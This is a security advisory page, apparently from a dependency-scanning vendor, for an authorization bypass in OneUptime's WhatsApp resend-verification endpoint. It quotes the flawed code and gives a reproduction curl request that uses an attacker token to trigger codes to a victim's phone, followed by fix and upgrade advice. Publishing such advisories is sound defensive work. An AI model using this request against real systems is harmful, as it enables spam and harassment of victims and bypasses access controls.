Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦 npm

GHSA-cw6x-mw64-q6pv

OneUptime has WhatsApp Resend Verification Authorization Bypass

Also known asCVE-2026-30959
Published
Mar 10, 2026
Updated
Mar 10, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
0.4%probability of exploitation in next 30 days
Lower Risk29th percentile+0.35%
0.00%0.29%0.58%0.87%0.0%0.0%0.0%0.4%Apr 26Jun 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected
📦@oneuptime/common

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects npm packages — download data is not available via public APIs for these ecosystems.

Description

Description

The resend-verification-code endpoint allows any authenticated user to trigger a verification code resend for any UserWhatsApp record by ID. Ownership is not validated (unlike the verify endpoint).

Affected Source

Full Code Lines (UserWhatsAppAPI.ts)

Resend path (authorization gap):

    this.router.post(
      `${new this.entityType()
        .getCrudApiPath()
        ?.toString()}/resend-verification-code`,
      UserMiddleware.getUserMiddleware,
      async (req: ExpressRequest, res: ExpressResponse, next: NextFunction) => {
        try {
          req = req as OneUptimeRequest;

          if (!req.body.itemId) {
            return Response.sendErrorResponse(
              req,
              res,
              new BadDataException("Invalid item ID"),
            );
          }

          await this.service.resendVerificationCode(req.body.itemId);

          return Response.sendEmptySuccessResponse(req, res);
        } catch (err) {
          return next(err);
        }
      },
    );

Verify path (ownership check present):

          if (
            item.userId?.toString() !==
            (req as OneUptimeRequest)?.userAuthorization?.userId?.toString()
          ) {
            return Response.sendErrorResponse(
              req,
              res,
              new BadDataException("Invalid user ID"),
            );
          }

Prerequisites

  • Valid attacker account with access to a project
  • Attacker access token
  • A victim’s UserWhatsApp itemId belonging to the same project

Steps to Reproduce

  1. Set your attacker token:

    export ATK="Bearer <attacker-access-token>"

  2. Trigger resend for the victim’s item:

    curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: $ATK" \
  -d '{"itemId":"<victim-userwhatsapp-id>"}' \
  http://<host>/api/user-whats-app/resend-verification-code

Expected/Observed Behavior

  • HTTP 200 with {} body and a new verification code sent to the victim’s phone
  • No checks confirm that item.userId equals the authenticated user’s ID for the resend path

Impact

  • Spam/DoS against victims’ phone numbers, social engineering pressure, and potential lockout flows due to repeated resends

Recommended Fix

  • Enforce ownership: item.userId must match the authenticated user
  • Add per-item and per-user rate limiting for resends

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npm@oneuptime/commonall versions10.0.21

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @oneuptime/common. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update @oneuptime/common to 10.0.21 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-cw6x-mw64-q6pv is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-cw6x-mw64-q6pv is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-cw6x-mw64-q6pv. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Description The resend-verification-code endpoint allows any authenticated user to trigger a verification code resend for any `UserWhatsApp` record by ID. Ownership is not validated (unlike the verify endpoint). ### Affected Source - Endpoint: [UserWhatsAppAPI.ts](https://github.com/OneUptime/oneuptime/Common/Server/API/UserWhatsAppAPI.ts#L129-L153) - Service: [UserWhatsAppService.ts](https://github.com/OneUptime/oneuptime/Common/Server/API/UserWhatsAppAPI.ts#L129-L153) - Verify ownership (present in verify endpoint for comparison): [UserWhatsAppAPI.ts](https://github.com/OneUpt
O3 Security · Impact-Aware SCA

Is GHSA-cw6x-mw64-q6pv in your dependencies?

O3 detects GHSA-cw6x-mw64-q6pv across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works